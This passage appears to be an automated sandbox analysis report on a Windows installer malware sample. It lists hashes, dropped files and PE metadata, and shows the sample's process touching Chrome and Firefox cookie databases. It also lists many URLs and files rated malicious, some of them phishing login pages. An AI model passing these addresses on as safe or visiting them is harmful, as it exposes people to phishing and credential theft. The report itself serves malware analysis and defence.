                                          https://linkprotect.cudasvc.com/url?a=https%3a%2f%2furldefense.proofpoint.com%2fv2%2furl%3fu%3dhttps-3A__nam10.safelinks.protection.outlook.com_-3Furl-3Dhttps-253A-252F-252Fclickmetertracking.com-252Fruzw-26data-3D04-257C01-257Ctaylort-2540fidelityak.com-257Cbb385152ed2b4de2287908d99b11f518-257Ce970b0df0604490eadde72144fd25fc4-257C0-257C1-257C637711323719974269-257CUnknown-257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0-253D-257C0-26sdata-3DN-252FatO-252Fty4BBOQMQ-252FCwIby-252B-252BJlESo3UqZZJvAGLOOCDc-253D-26reserved-3D0%26d%3dDwMFaQ%26c%3deuGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM%26r%3dYXmZYgEnnCTnSsNM-ee-N2bqdRkdQfLq7vYutZ6il2w%26m%3dm1ClVCcbBqmDxTJDrZ_RBzOw-Ggn-uL_-_l2Z21i9TQ%26s%3dv5_HQJjJQ36zbrMPvOr4PYTZ8WXHSPPCXoQzh2S7we4%26e%3d&c=E,1,gwDtbHHCzvkITP85UmAPtKF5E1YIxoGXf8LlghxOUBB7TBChXP4qXaJjiu5CkZsbUcOpGnrnchkKgugSHzaPtfzMln2Rn1TPsWGrFYhdhi-5Y9p0Ag,,&typo=1Get hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          setup.exeGet hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          https://kingfishersoftware.com/lcombs/BusinessconnectGet hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          https://remaxfilevoicenote.weebly.com/Get hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          https://k6ut.me/7I1NTGet hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          bkWTAfL6Sy.exeGet hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          https://buyingsellingdfw.com/auth09/Office365/Login/Get hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          http://wbx4psiw4w.evolutecinformatica.com.br/#.aHR0cHM6Ly92aXJhbHRocm9iLmNvbS9hZG1pbmNvbnNvbGVjcHNlc3MvbHQvY2hyaXMuZGF1bmhhdWVyQGthbmF0YWVuZXJneS5jb20=Get hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          https://coastalhomes.cc/secure/Get hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          ent.dllGet hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          http://crydump.com/Get hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          GpWp9qqlTI.exeGet hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          Proforma for PO No.01254556.htmlGet hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          ATT30392.htmGet hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          ATT30392.htmGet hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          http://tracking.a-zconferences.com/tracking/click?d=CwBBZVbWtWnUuCGAOdIr1xDYZimBZqKDLt3041xCduEfR4qdhFB5_kMF11P8WzRb1mEpNdHT5h2X2bIx9WpAY0bdg8kdrC3YQ6IENIOUiToYNftWHGxUyMaVhS55p_ZzVk57Qcrbdrgfj5PZ7uUjJCJxkNFc0CRRCh51n6rbiAy50laiQ9CgHMRbSAinjjDmug2Get hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          https://t4ucq-ayaaa-aaaad-qb72q-cai.ic0.app/Get hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          C:\Users\user\AppData\Local\Temp\AsOpenFile.exexcVh7ZmH4Y.exeGet hashmaliciousBrowse
                                            C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dllxcVh7ZmH4Y.exeGet hashmaliciousBrowse
                                              3GJ6S3Kwnb.exeGet hashmaliciousBrowse
                                                3GJ6S3Kwnb.exeGet hashmaliciousBrowse
                                                  file.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      Bayaran Balik Cukai Terlebih Bayar.exeGet hashmaliciousBrowse
                                                        Bayaran Balik Cukai Terlebih Bayar.exeGet hashmaliciousBrowse
                                                          7RsSycKaNc.exeGet hashmaliciousBrowse
                                                            7RsSycKaNc.exeGet hashmaliciousBrowse
                                                              potwierdzenie wplaty.exeGet hashmaliciousBrowse
                                                                potwierdzenie wplaty.exeGet hashmaliciousBrowse
                                                                  Docs advice copy.exeGet hashmaliciousBrowse
                                                                    Docs advice copy.exeGet hashmaliciousBrowse
                                                                      Transferencia desde ING.exeGet hashmaliciousBrowse
                                                                        Transferencia desde ING.exeGet hashmaliciousBrowse
                                                                          shipping document.exeGet hashmaliciousBrowse
                                                                            shipping document.exeGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exeGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exeGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.generic.ml.1686.exeGet hashmaliciousBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\Airplane_16.bmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                                    Category:dropped
                                                                                    Size (bytes):7034
                                                                                    Entropy (8bit):7.874844124591446
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:oXR8klpIMVf8CS3YqolBYC7ulSDIgQmFPb9l:KRTlvVfTSIPlBHSHmV
                                                                                    MD5:CA6DEA86854AFA7188D36EAC6C9E88C3
                                                                                    SHA1:7A05B62C2E39DABA0F6548F159A4428F07E476CE
                                                                                    SHA-256:35F6BD6D5E34DFB89E9D55DB626A97F582B1A9DFED0DB6514BE9D2BB36674766
                                                                                    SHA-512:6CC963F7E074E4037A1092661DFD219CE1C61DA8465766D0F9D6BAE0D1B3A91AE53415C0D98E5DC1D9FB5A082F47E1EB8E48334D6CD993888E680DA4D37EA7FC
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(.....i.....G...S...[.*.;.......U..hz|.2M..i}..o..<.N..3.i..q..\\.3M._.G..........1...Z-....7....n..1X.Zg.6:.........)..?..h.8......._..?...w..-b..z..<I.?...n..R.j..........!.....4E.ny.........r....M......o.C"At.|+....!ai.....z..........L9`Y.....<...'.*].....w.Q..Q^.}oe=....

                                                                                    C:\Users\user\AppData\Local\Temp\AsOpenFile.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):38632
                                                                                    Entropy (8bit):5.840976252158136
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:tba0g4rhVUkxIIaPrd6cMCP1diTLmz1BeeKH2X98VwhH:HPUkxIIaPrsCPXK6z1Bee3+k
                                                                                    MD5:ED609F8F09DE8AAA4F8CFF0285E0420A
                                                                                    SHA1:A7ADE9EB5BD4BAEFAB796C1D6EA92417F1396135
                                                                                    SHA-256:2488796ACE769813C729198CFD9E3C9D0A512168301D387BE569F2557C683821
                                                                                    SHA-512:32F080433C121FE1970BBB82911024A389E43B8B6BA059931FF0F3AFA4096BE79660C6DC9C1E027C21692D320F95896B0211C9FA0997AEC30F7A373382443FF2
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: xcVh7ZmH4Y.exe, Detection: malicious, Browse
                                                                                    Reputation:low
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........!..r..r..r..4r..r..s..r..s..r..s..r..s..r..r..r..s..rp.s..rp.Xr..r.0r..rp.s..rRich..r........................PE..d......a..........#..........^.................@....................................Vo.... ..................................................N..........h....p..L....x...............B..p...................@D..(...@C...............0...............................text............................... ..`.rdata..*....0...0..."..............@..@.data........`.......R..............@....pdata..L....p.......T..............@..@.rsrc...h........ ...X..............@..@................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\Borders.dat

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):107600
                                                                                    Entropy (8bit):6.716084941250493
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:OnVDP3flBi/Rzv+bWZeail8LD3vqJID7m1dWM/ACqrLcxmTlodLRZA:6xlBM7pealD/qWmbj/ArcnFZA
                                                                                    MD5:3DC4351E49C286A5D2AAA510B0917777
                                                                                    SHA1:8B24CE404813D701AA53D92AFD892EFA1860FC02
                                                                                    SHA-256:4BD89C5A04D57746BD92264A03274791F95256FE3295A6F42820399F620730AE
                                                                                    SHA-512:54973F8B9C3EA0742BB1A520D8BFAD816E4B53AEC34C89E082B26DDC871EE63244394AF53C8C3D0DCAD85AFFC0A5FB57AD501E016ECF040AAFCA8B83E85B19E5
                                                                                    Malicious:false
                                                                                    Preview:x.?..q/r....cB]...-9.#..c....,#....Z....q.k..g}.r{..<1O.f..=...|..;."......U.P..E.i^....Qi...[.....V..2~.=.{.jz$:.IT.o........R...."`.....u..+.qeq..4. ...P.{)L..J....f.nL.*..5.ms......ft..:/7.p..N.c.-...OC11!S...]..f..Y.$c./|.y:.,.....f..Hj.....F...m+Fx....$C...56...Z.b2.g.S..T.+`.q..b.".....M...m54..2b&.u...(^&..&...y.f:..u.5.'WWU^E.[..}8...P.]y.;)......K.:.O..3..R.0$LF...oE.-u.\..j.+..^D......+SAXN.b...)J....Pn......s]>..."......&..5....q1K.+..8.W6..,.E!,Q...N..a..6.w.t'.Q.......1.......0Z..{bc....f.I...5k.....V.r.m...d..Zt{._.6|..gH.z...?X..#r-=.......Uo.c.0q.*.?<.U.eMe3..S.;.....T.h.......+o..s....!.oXs!.)......X....ek0...8!..,5.Y3[..?Js.....Y..0...3.|;}tFE.6.".%Y.z.P.....s.H".G.[.b..hT.Yo..A.o.c2..Z..Z...t..>...2.Z.....1.F.Mq...D...a7...6....e..r'....3&...r..<.Y.n...i<..T?...P.B!...@.?..Xy..G'r4..v4.y^.\.`......8....M....}I...{.%.....3Q..k'X...@..d..Gp...s.n.......c...........$.c)BB.i..I.\h.)YT..U.....5.tM.d......v..

                                                                                    C:\Users\user\AppData\Local\Temp\Green_Leaves_21.bmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                                    Category:dropped
                                                                                    Size (bytes):10115
                                                                                    Entropy (8bit):7.896422756961018
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:oXRIG87sv/m1vnKaVSuKRXL55hOuf4dXL9J0LEvJyVVcuJ6Sj7YvKvtOJ:KRIjsW1vKPXBgdiWMEMj7YyvG
                                                                                    MD5:2F12A714A50993C090C94EC2672490E1
                                                                                    SHA1:4F9A319C412F1B1B251C027B1C2448BBDBB9CA6F
                                                                                    SHA-256:E759639DCCA8E96864BC82EDBACFD5BB14FE37412A6F3FCE7C82BF1BB944B6E4
                                                                                    SHA-512:2B349EAB24DCCE0DBD36433DE13E0B2A551E88A626D5C9A3F68B79E21ACDE4FC238DD4E280E30ACBB76B0EB0E08CE1ACC233AB1C9E2147E2DD01E0917B3A376B
                                                                                    Malicious:false
                                                                                    Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(..0..?l...9.l...7.......S.h..5.....!9...[..$M...E'..y.l@Xxg.i...........?..7..3M.........E...L..Z.$....B.b.@...y.y'..}._.|c......5....G..5-{l.-....+._Q....7......D.|....M.Hb..x....._P./o...RJ0{Zr..q+.....1.......X......G.....|1}...}.a.}/J..Gk.[...j.......+.. .n"..X.Q..9..$....o.....8...o.|K....}

                                                                                    C:\Users\user\AppData\Local\Temp\duperinger.ini

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):37
                                                                                    Entropy (8bit):4.432294243948856
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:1HMWqYhfczC7v:1ffjv
                                                                                    MD5:F34AA87B2A4A9593506E17AE5AD7657F
                                                                                    SHA1:37DA57F785BC83EFDC442863B8E11F12B850A17F
                                                                                    SHA-256:6DF91395E1AE5EE71A11675B089F0AC4EF6330C9217022B6FEEF07E68FE65128
                                                                                    SHA-512:7EC0A371A1A765E47E9ECBB60500363F312DCBC78DAFF95B115A337F0833DE1C23ABFF4FAE8628010C1FD5FBE94EFA60D1F1A88CAE8947A79BA77BAF22CCCD7A
                                                                                    Malicious:false
                                                                                    Preview:[Exorcise]..PYROPHYLLTE=Fornrmelser..

                                                                                    C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):12288
                                                                                    Entropy (8bit):5.814115788739565
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                    MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                    SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                    SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                    SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: xcVh7ZmH4Y.exe, Detection: malicious, Browse
                                                                                    • Filename: 3GJ6S3Kwnb.exe, Detection: malicious, Browse
                                                                                    • Filename: 3GJ6S3Kwnb.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: Bayaran Balik Cukai Terlebih Bayar.exe, Detection: malicious, Browse
                                                                                    • Filename: Bayaran Balik Cukai Terlebih Bayar.exe, Detection: malicious, Browse
                                                                                    • Filename: 7RsSycKaNc.exe, Detection: malicious, Browse
                                                                                    • Filename: 7RsSycKaNc.exe, Detection: malicious, Browse
                                                                                    • Filename: potwierdzenie wplaty.exe, Detection: malicious, Browse
                                                                                    • Filename: potwierdzenie wplaty.exe, Detection: malicious, Browse
                                                                                    • Filename: Docs advice copy.exe, Detection: malicious, Browse
                                                                                    • Filename: Docs advice copy.exe, Detection: malicious, Browse
                                                                                    • Filename: Transferencia desde ING.exe, Detection: malicious, Browse
                                                                                    • Filename: Transferencia desde ING.exe, Detection: malicious, Browse
                                                                                    • Filename: shipping document.exe, Detection: malicious, Browse
                                                                                    • Filename: shipping document.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.generic.ml.1686.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\printer-symbolic.symbolic.png

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):147
                                                                                    Entropy (8bit):5.834297280344084
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:yionv//thPl9vt3lAnsrtxBllPhF1MzoQxJrN7djpdXLImeR/mV2kg1p:6v/lhPysx1MzoQxlRZbCRaip
                                                                                    MD5:38D787F55E22FB591135F9250CD259D4
                                                                                    SHA1:0E135B0E1CA49A6E43DB4CB7596FAEA022E23924
                                                                                    SHA-256:1ED839B015A67CAB9948469975411D982A96314CE82851EA2F9F6BB8D733A002
                                                                                    SHA-512:4E21AB54B7110B4CD2EBC0E2CF6DF3F8C7C988495BCCA76949BC3C5EB669A793FCCDA5CB4DDB7B627A21734BD181FE44670757144CC2A007FCB695405F08EC2B
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR................a....sBIT....|.d....JIDAT8.c`..0b..O..&J]@5....tR.>........`.8.(6....-Z....a..&..3 ....4...<.............IEND.B`.

                                                                                    C:\Users\user\AppData\Roaming\umsqbqzt.0jv\Chrome\Default\Cookies

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000
                                                                                    Category:dropped
                                                                                    Size (bytes):98304
                                                                                    Entropy (8bit):2.9216957692876595
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
                                                                                    MD5:1A706D20E96086886B5D00D9698E09DF
                                                                                    SHA1:DACF81D90647457585345BEDD6DE222E83FDE01F
                                                                                    SHA-256:759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
                                                                                    SHA-512:CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Roaming\umsqbqzt.0jv\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000
                                                                                    Category:modified
                                                                                    Size (bytes):98304
                                                                                    Entropy (8bit):0.08231524779339361
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                                                    MD5:886A5F9308577FDF19279AA582D0024D
                                                                                    SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                                                    SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                                                    SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    \Device\ConDrv

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):30
                                                                                    Entropy (8bit):3.964735178725505
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                                    MD5:9F754B47B351EF0FC32527B541420595
                                                                                    SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                                    SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                                    SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                                    Malicious:false
                                                                                    Preview:NordVPN directory not found!..

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):6.199795193277217
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:xcVh7ZmH4Y.exe
                                                                                    File size:306502
                                                                                    MD5:d17d180329065df1bf54501a2c8e138b
                                                                                    SHA1:255c70621a90d6070d2585ef47eaff05c143c54a
                                                                                    SHA256:6a3b4d2025462d750011db9881bd74700cf7e2e7708398a18dfec422555ba438
                                                                                    SHA512:14652b3a013749bdeb7fe454b0cf07f4aa9d064548d6ae98369b412892e7aa1a35623d2c48f18922896d7d12bf30c57d5e23e07dc955ffe0bfc9e8b737371317
                                                                                    SSDEEP:6144:XbE/HUp8lYEkA1Jutcmjo0iHGpMrs+/llqSQZr5PoNzbC8USMxQKQ+:Xb9OYEkA1Jutcmjo0imp2s+tQSQZtPoO
                                                                                    TLSH:6054C09637C8E6F0E5A182745C79C5AB0F2A3C3BDA70591F3FD17B0F24B1260871A929
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

                                                                                    File Icon

                                                                                    Icon Hash:7860e068e0fcf870

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x40352d
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                    Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 000003F4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [ebp-14h], ebx
                                                                                    mov dword ptr [ebp-04h], 0040A2E0h
                                                                                    mov dword ptr [ebp-10h], ebx
                                                                                    call dword ptr [004080CCh]
                                                                                    mov esi, dword ptr [004080D0h]
                                                                                    lea eax, dword ptr [ebp-00000140h]
                                                                                    push eax
                                                                                    mov dword ptr [ebp-0000012Ch], ebx
                                                                                    mov dword ptr [ebp-2Ch], ebx
                                                                                    mov dword ptr [ebp-28h], ebx
                                                                                    mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                    call esi
                                                                                    test eax, eax
                                                                                    jne 00007FB5205FEC3Ah
                                                                                    lea eax, dword ptr [ebp-00000140h]
                                                                                    mov dword ptr [ebp-00000140h], 00000114h
                                                                                    push eax
                                                                                    call esi
                                                                                    mov ax, word ptr [ebp-0000012Ch]
                                                                                    mov ecx, dword ptr [ebp-00000112h]
                                                                                    sub ax, 00000053h
                                                                                    add ecx, FFFFFFD0h
                                                                                    neg ax
                                                                                    sbb eax, eax
                                                                                    mov byte ptr [ebp-26h], 00000004h
                                                                                    not eax
                                                                                    and eax, ecx
                                                                                    mov word ptr [ebp-2Ch], ax
                                                                                    cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                    jnc 00007FB5205FEC0Ah
                                                                                    and word ptr [ebp-00000132h], 0000h
                                                                                    mov eax, dword ptr [ebp-00000134h]
                                                                                    movzx ecx, byte ptr [ebp-00000138h]
                                                                                    mov dword ptr [00434FB8h], eax
                                                                                    xor eax, eax
                                                                                    mov ah, byte ptr [ebp-0000013Ch]
                                                                                    movzx eax, ax
                                                                                    or eax, ecx
                                                                                    xor ecx, ecx
                                                                                    mov ch, byte ptr [ebp-2Ch]
                                                                                    movzx ecx, cx
                                                                                    shl eax, 10h
                                                                                    or eax, ecx

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x28500.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                    .ndata0x360000x2e0000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x640000x285000x28600False0.275118517802data4.14455193293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_ICON0x643580x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
